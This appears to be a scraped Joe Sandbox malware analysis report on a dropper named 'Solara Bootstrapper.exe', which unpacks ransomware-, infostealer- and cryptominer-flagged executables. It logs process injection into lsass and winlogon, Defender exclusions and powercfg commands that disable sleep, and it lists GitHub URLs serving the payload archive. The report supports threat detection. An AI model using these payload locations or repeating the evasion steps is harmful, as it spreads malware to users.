Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\dialer.exeCode function: 46_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,46_2_0000000140001B54
Source: C:\Windows\System32\conhost.exeCode function: 2_2_0000019A49807960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_0000019A49807960
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
Native API
1
DLL Side-Loading
1
DLL Side-Loading
11
Disable or Modify Tools
1
Credential API Hooking
1
System Time Discovery
Remote Services1
Archive Collected Data
3
Ingress Tool Transfer
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts12
Command and Scripting Interpreter
1
Windows Service
1
Access Token Manipulation
1
Deobfuscate/Decode Files or Information
LSASS Memory2
File and Directory Discovery
Remote Desktop Protocol1
Credential API Hooking
11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Service Execution
Logon Script (Windows)1
Windows Service
1
Obfuscated Files or Information
Security Account Manager23
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
PowerShell
Login Hook712
Process Injection
1
Timestomp
NTDS22
Security Software Discovery
Distributed Component Object ModelInput Capture4
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets1
Process Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
Rootkit
Cached Domain Credentials31
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Masquerading
DCSync1
Application Window Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
Virtualization/Sandbox Evasion
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Access Token Manipulation
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron712
Process Injection
Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
Hidden Files and Directories
Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585414 Sample: Solara Bootstrapper.exe Startdate: 07/01/2025 Architecture: WINDOWS Score: 100 87 raw.githubusercontent.com 2->87 89 github.com 2->89 95 Antivirus detection for dropped file 2->95 97 Antivirus / Scanner detection for submitted sample 2->97 99 Multi AV Scanner detection for dropped file 2->99 101 15 other signatures 2->101 10 Solara Bootstrapper.exe 3 2->10         started        14 eejhedztifcv.exe 2->14         started        16 eejhedztifcv.exe 2->16         started        signatures3 process4 file5 81 C:\Users\user\AppData\Local\Temp\kx new.exe, PE32 10->81 dropped 83 C:\Users\user\...\SolaraBootstrapper.exe, PE32 10->83 dropped 127 Encrypted powershell cmdline option found 10->127 18 kx new.exe 3 10->18         started        22 SolaraBootstrapper.exe 15 9 10->22         started        25 powershell.exe 23 10->25         started        129 Multi AV Scanner detection for dropped file 14->129 signatures6 process7 dnsIp8 77 C:\Users\user\AppData\Local\...\xmr new.exe, PE32+ 18->77 dropped 79 C:\Users\user\AppData\...\Kawpow new.exe, PE32+ 18->79 dropped 103 Encrypted powershell cmdline option found 18->103 27 xmr new.exe 18->27         started        30 Kawpow new.exe 1 2 18->30         started        33 powershell.exe 23 18->33         started        91 github.com 140.82.121.3, 443, 49704, 49706 GITHUBUS United States 22->91 93 raw.githubusercontent.com 185.199.109.133, 443, 49705 FASTLYUS Netherlands 22->93 105 Multi AV Scanner detection for dropped file 22->105 35 conhost.exe 22->35         started        107 Loading BitLocker PowerShell Module 25->107 37 conhost.exe 25->37         started        file9 signatures10 process11 file12 131 Modifies the context of a thread in another process (thread injection) 27->131 133 Adds a directory exclusion to Windows Defender 27->133 135 Modifies power options to not sleep / hibernate 27->135 39 dialer.exe 27->39         started        42 powershell.exe 27->42         started        44 cmd.exe 27->44         started        54 11 other processes 27->54 85 C:\ProgramData\...\eejhedztifcv.exe, PE32+ 30->85 dropped 46 dialer.exe 30->46         started        48 powershell.exe 23 30->48         started        50 cmd.exe 30->50         started        56 13 other processes 30->56 137 Loading BitLocker PowerShell Module 33->137 52 conhost.exe 33->52         started        signatures13 process14 signatures15 109 Injects code into the Windows Explorer (explorer.exe) 39->109 111 Writes to foreign memory regions 39->111 113 Allocates memory in foreign processes 39->113 115 Creates a thread in another existing process (thread injection) 39->115 58 lsass.exe 39->58 injected 117 Loading BitLocker PowerShell Module 42->117 61 conhost.exe 42->61         started        63 WmiPrvSE.exe 42->63         started        69 2 other processes 44->69 119 Contains functionality to inject code into remote processes 46->119 121 Injects a PE file into a foreign processes 46->121 123 Contains functionality to compare user and computer (likely to detect sandboxes) 46->123 65 winlogon.exe 46->65 injected 67 conhost.exe 48->67         started        71 2 other processes 50->71 73 11 other processes 54->73 75 13 other processes 56->75 process16 signatures17 125 Writes to foreign memory regions 58->125

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Solara Bootstrapper.exe68%ReversingLabsWin32.Dropper.Dapato
Solara Bootstrapper.exe100%AviraTR/Dropper.Gen
Solara Bootstrapper.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\kx new.exe100%AviraTR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\kx new.exe100%Joe Sandbox ML
C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe74%ReversingLabsWin64.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\Kawpow new.exe74%ReversingLabsWin64.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe33%ReversingLabsWin32.PUA.Packunwan
C:\Users\user\AppData\Local\Temp\kx new.exe71%ReversingLabsWin32.Ransomware.Generic
C:\Users\user\AppData\Local\Temp\xmr new.exe74%ReversingLabsWin64.Infostealer.Tinba
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
github.com
140.82.121.3
truefalse
    high
    raw.githubusercontent.com
    185.199.109.133
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txtfalse
        high
        https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zipfalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2223359598.00000000054BB000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2201684316.00000000045A6000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.2201684316.00000000045A6000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2201684316.00000000045A6000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.2201684316.00000000045A6000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://contoso.com/powershell.exe, 00000001.00000002.2223359598.00000000054BB000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2223359598.00000000054BB000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/Licensepowershell.exe, 00000001.00000002.2223359598.00000000054BB000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://contoso.com/Iconpowershell.exe, 00000001.00000002.2223359598.00000000054BB000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://aka.ms/pscore6lBjqpowershell.exe, 00000001.00000002.2201684316.0000000004451000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zipKSolara Bootstrapper.exe, 00000000.00000002.2099938407.00000000013D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2201684316.0000000004451000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2201684316.00000000045A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    185.199.109.133
                                    raw.githubusercontent.comNetherlands
                                    54113FASTLYUSfalse
                                    140.82.121.3
                                    github.comUnited States
                                    36459GITHUBUSfalse
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1585414
                                    Start date and time:2025-01-07 16:08:09 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 11m 22s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:75
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:2
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:Solara Bootstrapper.exe
                                    Detection:MAL
                                    Classification:mal100.spyw.evad.winEXE@110/24@2/2
                                    EGA Information:
                                    • Successful, ratio: 66.7%
                                    HCA Information:
                                    • Successful, ratio: 97%
                                    • Number of executed functions: 215
                                    • Number of non-executed functions: 227
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                                    • Excluded IPs from analysis (whitelisted): 13.107.246.44, 20.109.210.53
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target Kawpow new.exe, PID 7244 because it is empty
                                    • Execution Graph export aborted for target SolaraBootstrapper.exe, PID 3948 because it is empty
                                    • Execution Graph export aborted for target eejhedztifcv.exe, PID 7612 because there are no executed function
                                    • Execution Graph export aborted for target eejhedztifcv.exe, PID 7948 because it is empty
                                    • Execution Graph export aborted for target xmr new.exe, PID 7376 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtCreateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: Solara Bootstrapper.exe
                                    TimeTypeDescription
                                    10:09:04API Interceptor103x Sleep call for process: powershell.exe modified
                                    10:09:07API Interceptor1x Sleep call for process: Kawpow new.exe modified
                                    10:09:07API Interceptor1x Sleep call for process: xmr new.exe modified
                                    10:09:08API Interceptor16x Sleep call for process: SolaraBootstrapper.exe modified
                                    10:09:50API Interceptor310776x Sleep call for process: winlogon.exe modified
                                    10:09:51API Interceptor273428x Sleep call for process: lsass.exe modified
                                    10:09:52API Interceptor35359x Sleep call for process: WmiPrvSE.exe modified
                                    10:09:52API Interceptor70171x Sleep call for process: dialer.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    185.199.109.133cr_asm3.ps1Get hashmaliciousUnknownBrowse
                                    • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                    gabe.ps1Get hashmaliciousUnknownBrowse
                                    • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                    5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
